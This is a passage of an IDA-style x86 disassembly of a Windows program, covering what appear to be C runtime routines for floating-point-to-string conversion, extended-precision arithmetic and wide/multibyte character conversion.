mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_41F31F endp
; ---------------------------------------------------------------------------
off_41F7C0 dd offset loc_41F389 ; DATA XREF: sub_41F31F+63�r
dd offset loc_41F3D8 ; jump table for switch statement
dd offset loc_41F42F
dd offset loc_41F459
dd offset loc_41F4B4
dd offset loc_41F52B
dd offset loc_41F561
dd offset loc_41F5AB
dd offset loc_41F58A
dd offset loc_41F60F
dd offset loc_41F5F9
dd offset loc_41F5C5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F7F0 proc near ; CODE XREF: sub_41ECF8+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_41F852
mov byte ptr [ebx+2], 2Dh
jmp short loc_41F856
; ---------------------------------------------------------------------------
loc_41F852: ; CODE XREF: sub_41F7F0+5A�j
mov byte ptr [ebx+2], 20h
loc_41F856: ; CODE XREF: sub_41F7F0+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_41F87C
test edi, edi
jnz short loc_41F87C
cmp [ebp+arg_0], edi
jnz short loc_41F87C
loc_41F867: ; CODE XREF: sub_41F7F0+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_41FA7A
; ---------------------------------------------------------------------------
loc_41F87C: ; CODE XREF: sub_41F7F0+6C�j
; sub_41F7F0+70�j ...
cmp dx, si
jnz short loc_41F8FB
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_41F895
cmp [ebp+arg_0], 0
jz short loc_41F8A4
loc_41F895: ; CODE XREF: sub_41F7F0+9D�j
test edi, 40000000h
jnz short loc_41F8A4
push offset a1Snan ; "1#SNAN"
jmp short loc_41F8EA
; ---------------------------------------------------------------------------
loc_41F8A4: ; CODE XREF: sub_41F7F0+A3�j
; sub_41F7F0+AB�j
test cx, cx
jz short loc_41F8BE
cmp edi, 0C0000000h
jnz short loc_41F8BE
cmp [ebp+arg_0], 0
jnz short loc_41F8E5
push offset a1Ind ; "1#IND"
jmp short loc_41F8CD
; ---------------------------------------------------------------------------
loc_41F8BE: ; CODE XREF: sub_41F7F0+B7�j
; sub_41F7F0+BF�j
cmp edi, eax
jnz short loc_41F8E5
cmp [ebp+arg_0], 0
jnz short loc_41F8E5
push offset a1Inf ; "1#INF"
loc_41F8CD: ; CODE XREF: sub_41F7F0+CC�j
lea eax, [ebx+4]
push eax
call sub_417A00
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_41F8DC: ; CODE XREF: sub_41F7F0+109�j
and [ebp+var_4], 0
jmp loc_41FA53
; ---------------------------------------------------------------------------
loc_41F8E5: ; CODE XREF: sub_41F7F0+C5�j
; sub_41F7F0+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_41F8EA: ; CODE XREF: sub_41F7F0+B2�j
lea eax, [ebx+4]
push eax
call sub_417A00
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_41F8DC
; ---------------------------------------------------------------------------
loc_41F8FB: ; CODE XREF: sub_41F7F0+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_41FDC6
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_41F95C
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_41FBA6
pop ecx
pop ecx
loc_41F95C: ; CODE XREF: sub_41F7F0+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_41F976
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_41F979
jmp loc_41F867
; ---------------------------------------------------------------------------
loc_41F976: ; CODE XREF: sub_41F7F0+173�j
mov edi, [ebp+arg_C]
loc_41F979: ; CODE XREF: sub_41F7F0+17F�j
cmp edi, 15h
jle short loc_41F981
push 15h
pop edi
loc_41F981: ; CODE XREF: sub_41F7F0+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_41F997: ; CODE XREF: sub_41F7F0+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_41F1FD
dec [ebp+arg_14]
pop ecx
jnz short loc_41F997
test esi, esi
jge short loc_41F9C1
neg esi
and esi, 0FFh
jle short loc_41F9C1
loc_41F9B4: ; CODE XREF: sub_41F7F0+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_41F22B
dec esi
pop ecx
jnz short loc_41F9B4
loc_41F9C1: ; CODE XREF: sub_41F7F0+1B8�j
; sub_41F7F0+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_41FA1E
mov [ebp+arg_C], ecx
loc_41F9D1: ; CODE XREF: sub_41F7F0+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_41F1FD
lea eax, [ebp+var_10]
push eax
call sub_41F1FD
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41F19F
lea eax, [ebp+var_10]
push eax
call sub_41F1FD
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_41F9D1
mov eax, [ebp+arg_14]
loc_41FA1E: ; CODE XREF: sub_41F7F0+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_41FA5B
loc_41FA2B: ; CODE XREF: sub_41F7F0+248�j
cmp eax, ecx
jb short loc_41FA3E
cmp byte ptr [eax], 39h
jnz short loc_41FA3A
mov byte ptr [eax], 30h
dec eax
jmp short loc_41FA2B
; ---------------------------------------------------------------------------
loc_41FA3A: ; CODE XREF: sub_41F7F0+242�j
cmp eax, ecx
jnb short loc_41FA42
loc_41FA3E: ; CODE XREF: sub_41F7F0+23D�j
inc eax
inc word ptr [ebx]
loc_41FA42: ; CODE XREF: sub_41F7F0+24C�j
inc byte ptr [eax]
loc_41FA44: ; CODE XREF: sub_41F7F0+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41FA53: ; CODE XREF: sub_41F7F0+F0�j
mov eax, [ebp+var_4]
loc_41FA56: ; CODE XREF: sub_41F7F0+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41FA5B: ; CODE XREF: sub_41F7F0+239�j
; sub_41F7F0+275�j
cmp eax, ecx
jb short loc_41FA6B
cmp byte ptr [eax], 30h
jnz short loc_41FA67
dec eax
jmp short loc_41FA5B
; ---------------------------------------------------------------------------
loc_41FA67: ; CODE XREF: sub_41F7F0+272�j
cmp eax, ecx
jnb short loc_41FA44
loc_41FA6B: ; CODE XREF: sub_41F7F0+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_41FA7A: ; CODE XREF: sub_41F7F0+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_41FA56
sub_41F7F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FA83 proc near ; CODE XREF: sub_41EFBB+5E�p
; sub_420271+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_41FA90
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41FA90: ; CODE XREF: sub_41FA83+7�j
push dword_516C84
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_516EA4
call sub_41FE42
add esp, 1Ch
test eax, eax
jnz short loc_41FABD
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41FABD: ; CODE XREF: sub_41FA83+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_41FA83 endp
; =============== S U B R O U T I N E =======================================
sub_41FAC2 proc near ; CODE XREF: sub_41EFBB+1E�p
; sub_4200EA+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_5158B4
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_41FB23
mov ebx, dword_421158
loc_41FADB: ; CODE XREF: sub_41FAC2+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_41FB2B
push ebp
call sub_417BEE
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_41FB2B
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_41FB2B
push edi
push [esp+18h+var_4]
call sub_4200EA
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_41FADB
loc_41FB23: ; CODE XREF: sub_41FAC2+11�j
xor eax, eax
loc_41FB25: ; CODE XREF: sub_41FAC2+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41FB2B: ; CODE XREF: sub_41FAC2+29�j
; sub_41FAC2+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_41FB25
sub_41FAC2 endp
; =============== S U B R O U T I N E =======================================
sub_41FB30 proc near ; CODE XREF: sub_41F038+8B�p
; sub_41F038+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_516C80
jnb short loc_41FB97
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_516B80[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_41FB97
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_41FB70
and cl, 7Fh
jmp short loc_41FB7D
; ---------------------------------------------------------------------------
loc_41FB70: ; CODE XREF: sub_41FB30+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_41FB8B
or cl, 80h
loc_41FB7D: ; CODE XREF: sub_41FB30+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41FB8B: ; CODE XREF: sub_41FB30+48�j
mov dword_515884, 16h
jmp short loc_41FBA1
; ---------------------------------------------------------------------------
loc_41FB97: ; CODE XREF: sub_41FB30+B�j
; sub_41FB30+27�j
mov dword_515884, 9
loc_41FBA1: ; CODE XREF: sub_41FB30+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_41FB30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FBA6 proc near ; CODE XREF: sub_41F7F0+165�p
; sub_41FDC6+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_41FDA6
cmp cx, 7FFFh
jnb loc_41FDA6
cmp dx, 0BFFDh
ja loc_41FDA6
cmp dx, 3FBFh
ja short loc_41FC0F
xor eax, eax
jmp short loc_41FC49
; ---------------------------------------------------------------------------
loc_41FC0F: ; CODE XREF: sub_41FBA6+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_41FC31
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_41FC31
xor eax, eax
cmp [esi+4], eax
jnz short loc_41FC33
cmp [esi], eax
jnz short loc_41FC33
jmp loc_41FDA0
; ---------------------------------------------------------------------------
loc_41FC31: ; CODE XREF: sub_41FBA6+71�j
; sub_41FBA6+79�j
xor eax, eax
loc_41FC33: ; CODE XREF: sub_41FBA6+80�j
; sub_41FBA6+84�j
cmp cx, ax
jnz short loc_41FC56
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_41FC56
cmp [ebx+4], eax
jnz short loc_41FC56
cmp [ebx], eax
jnz short loc_41FC56
loc_41FC49: ; CODE XREF: sub_41FBA6+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_41FDC1
; ---------------------------------------------------------------------------
loc_41FC56: ; CODE XREF: sub_41FBA6+90�j
; sub_41FBA6+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_41FC66: ; CODE XREF: sub_41FBA6+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_41FCBA
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_41FC82: ; CODE XREF: sub_41FBA6+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41F17E
add esp, 0Ch
test eax, eax
jz short loc_41FCAD
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_41FCAD: ; CODE XREF: sub_41FBA6+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_41FC82
loc_41FCBA: ; CODE XREF: sub_41FBA6+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_41FC66
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_41FCFD
loc_41FCD8: ; CODE XREF: sub_41FBA6+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_41FCF6
lea eax, [ebp+var_24]
push eax
call sub_41F1FD
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_41FCD8
loc_41FCF6: ; CODE XREF: sub_41FBA6+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_41FD36
loc_41FCFD: ; CODE XREF: sub_41FBA6+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_41FD36
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_41FD16: ; CODE XREF: sub_41FBA6+184�j
test byte ptr [ebp+var_24], 1
jz short loc_41FD1F
inc [ebp+var_14]
loc_41FD1F: ; CODE XREF: sub_41FBA6+174�j
lea eax, [ebp+var_24]
push eax
call sub_41F22B
dec ebx
pop ecx
jnz short loc_41FD16
cmp [ebp+var_14], 0
jz short loc_41FD36
or byte ptr [ebp+var_24], 1
loc_41FD36: ; CODE XREF: sub_41FBA6+155�j
; sub_41FBA6+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_41FD4D
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_41FD82
loc_41FD4D: ; CODE XREF: sub_41FBA6+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_41FD7F
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_41FD7A
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_41FD74
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_41FD82
; ---------------------------------------------------------------------------
loc_41FD74: ; CODE XREF: sub_41FBA6+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_41FD82
; ---------------------------------------------------------------------------
loc_41FD7A: ; CODE XREF: sub_41FBA6+1B5�j
inc [ebp+var_20+2]
jmp short loc_41FD82
; ---------------------------------------------------------------------------
loc_41FD7F: ; CODE XREF: sub_41FBA6+1AB�j
inc [ebp+var_24+2]
loc_41FD82: ; CODE XREF: sub_41FBA6+1A5�j
; sub_41FBA6+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_41FDA6
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_41FDA0: ; CODE XREF: sub_41FBA6+86�j
mov [esi+0Ah], ax
jmp short loc_41FDC1
; ---------------------------------------------------------------------------
loc_41FDA6: ; CODE XREF: sub_41FBA6+42�j
; sub_41FBA6+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_41FDC1: ; CODE XREF: sub_41FBA6+AB�j
; sub_41FBA6+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FBA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FDC6 proc near ; CODE XREF: sub_41F31F+440�p
; sub_41F7F0+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_43BF50
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_41FE3F
jge short loc_41FDEE
mov eax, [ebp+arg_4]
mov ebx, offset dword_43C0B0
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_41FDEE: ; CODE XREF: sub_41FDC6+16�j
cmp [ebp+arg_8], ecx
jnz short loc_41FDF9
mov eax, [ebp+arg_0]
mov [eax], cx
loc_41FDF9: ; CODE XREF: sub_41FDC6+2B�j
cmp [ebp+arg_4], ecx
jz short loc_41FE3F
push esi
push edi
loc_41FE00: ; CODE XREF: sub_41FDC6+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_41FE38
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_41FE2B
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_41FE2B: ; CODE XREF: sub_41FDC6+57�j
push esi
push [ebp+arg_0]
call sub_41FBA6
pop ecx
pop ecx
xor ecx, ecx
loc_41FE38: ; CODE XREF: sub_41FDC6+49�j
cmp [ebp+arg_4], ecx
jnz short loc_41FE00
pop edi
pop esi
loc_41FE3F: ; CODE XREF: sub_41FDC6+14�j
; sub_41FDC6+36�j
pop ebx
leave
retn
sub_41FDC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE42 proc near ; CODE XREF: sub_41FA83+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421AA0
push offset sub_41D304
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_515B40, ebx
push 1
pop edi
jnz short loc_41FEB5
push edi
mov eax, offset dword_4216A0
push eax
push edi
push eax
push ebx
push ebx
nop
call near ptr 7C80A35Eh
test eax, eax
jz short loc_41FE92
mov dword_515B40, edi
jmp short loc_41FEB5
; ---------------------------------------------------------------------------
loc_41FE92: ; CODE XREF: sub_41FE42+46�j
push edi
mov eax, offset dword_441700
push eax
push edi
push eax
push ebx
push ebx
nop
call near ptr 7C80D077h
test eax, eax
jz loc_4200AB
mov dword_515B40, 2
loc_41FEB5: ; CODE XREF: sub_41FE42+31�j
; sub_41FE42+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_41FECC
push esi
push [ebp+arg_8]
call sub_4200BF
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_41FECC: ; CODE XREF: sub_41FE42+78�j
cmp [ebp+arg_14], ebx
jle short loc_41FEE1
push [ebp+arg_14]
push [ebp+arg_10]
call sub_4200BF
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_41FEE1: ; CODE XREF: sub_41FE42+8D�j
mov eax, dword_515B40
cmp eax, 2
jnz short loc_41FF06
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C80D077h
jmp loc_4200AD
; ---------------------------------------------------------------------------
loc_41FF06: ; CODE XREF: sub_41FE42+A7�j
cmp eax, edi
jnz loc_4200AB
cmp [ebp+arg_18], ebx
jnz short loc_41FF1B
mov eax, dword_5158FC
mov [ebp+arg_18], eax
loc_41FF1B: ; CODE XREF: sub_41FE42+CF�j
cmp esi, ebx
jz short loc_41FF28
cmp [ebp+arg_14], ebx
jnz loc_41FFC0
loc_41FF28: ; CODE XREF: sub_41FE42+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_41FF35
loc_41FF2D: ; CODE XREF: sub_41FE42+13C�j
; sub_41FE42+16D�j
push 2
loc_41FF2F: ; CODE XREF: sub_41FE42+146�j
pop eax
jmp loc_4200AD
; ---------------------------------------------------------------------------
loc_41FF35: ; CODE XREF: sub_41FE42+E9�j
cmp [ebp+arg_14], edi
jle short loc_41FF41
loc_41FF3A: ; CODE XREF: sub_41FE42+151�j
; sub_41FE42+159�j ...
mov eax, edi
jmp loc_4200AD
; ---------------------------------------------------------------------------
loc_41FF41: ; CODE XREF: sub_41FE42+F6�j
cmp esi, edi
jg short loc_41FF86
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
nop
call near ptr 7C812E76h
test eax, eax
jz loc_4200AB
cmp esi, ebx
jle short loc_41FF8A
cmp [ebp+var_3C], 2
jb short loc_41FF86
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_41FF86
loc_41FF6C: ; CODE XREF: sub_41FE42+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_41FF86
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_41FF80
cmp cl, dl
jbe short loc_41FF2D
loc_41FF80: ; CODE XREF: sub_41FE42+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_41FF6C
loc_41FF86: ; CODE XREF: sub_41FE42+101�j
; sub_41FE42+120�j ...
push 3
jmp short loc_41FF2F
; ---------------------------------------------------------------------------
loc_41FF8A: ; CODE XREF: sub_41FE42+11A�j
cmp [ebp+arg_14], ebx
jle short loc_41FFC0
cmp [ebp+var_3C], 2
jb short loc_41FF3A
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_41FF3A
loc_41FF9D: ; CODE XREF: sub_41FE42+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_41FF3A
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_41FFB5
cmp cl, dl
jbe loc_41FF2D
loc_41FFB5: ; CODE XREF: sub_41FE42+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_41FF9D
jmp loc_41FF3A
; ---------------------------------------------------------------------------
loc_41FFC0: ; CODE XREF: sub_41FE42+E0�j
; sub_41FE42+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
nop
call near ptr 7C809BF8h
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_4200AB
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42000F
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_42000F: ; CODE XREF: sub_41FE42+1B5�j
cmp [ebp+var_24], ebx
jz loc_4200AB
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_421074
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_4200AB
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_4200AB
mov [ebp+var_4], edi
loc_42004D: ; DATA XREF: ___:00425F80�o
; ___:00425F8C�o
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42007A
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_42007A: ; CODE XREF: sub_41FE42+224�j
cmp edi, ebx
jz short loc_4200AB
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
nop
call near ptr 7C809BF8h
test eax, eax
jz short loc_4200AB
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C80A35Eh
jmp short loc_4200AD
; ---------------------------------------------------------------------------
loc_4200AB: ; CODE XREF: sub_41FE42+63�j
; sub_41FE42+C6�j ...
xor eax, eax
loc_4200AD: ; CODE XREF: sub_41FE42+BF�j
; sub_41FE42+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41FE42 endp
; =============== S U B R O U T I N E =======================================
sub_4200BF proc near ; CODE XREF: sub_41BC2B+81�p
; sub_41FE42+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4200DC
loc_4200CF: ; CODE XREF: sub_4200BF+1B�j
cmp byte ptr [eax], 0
jz short loc_4200DC
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4200CF
loc_4200DC: ; CODE XREF: sub_4200BF+E�j
; sub_4200BF+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4200E7
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4200E7: ; CODE XREF: sub_4200BF+21�j
mov eax, edx
retn
sub_4200BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4200EA proc near ; CODE XREF: sub_41FAC2+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
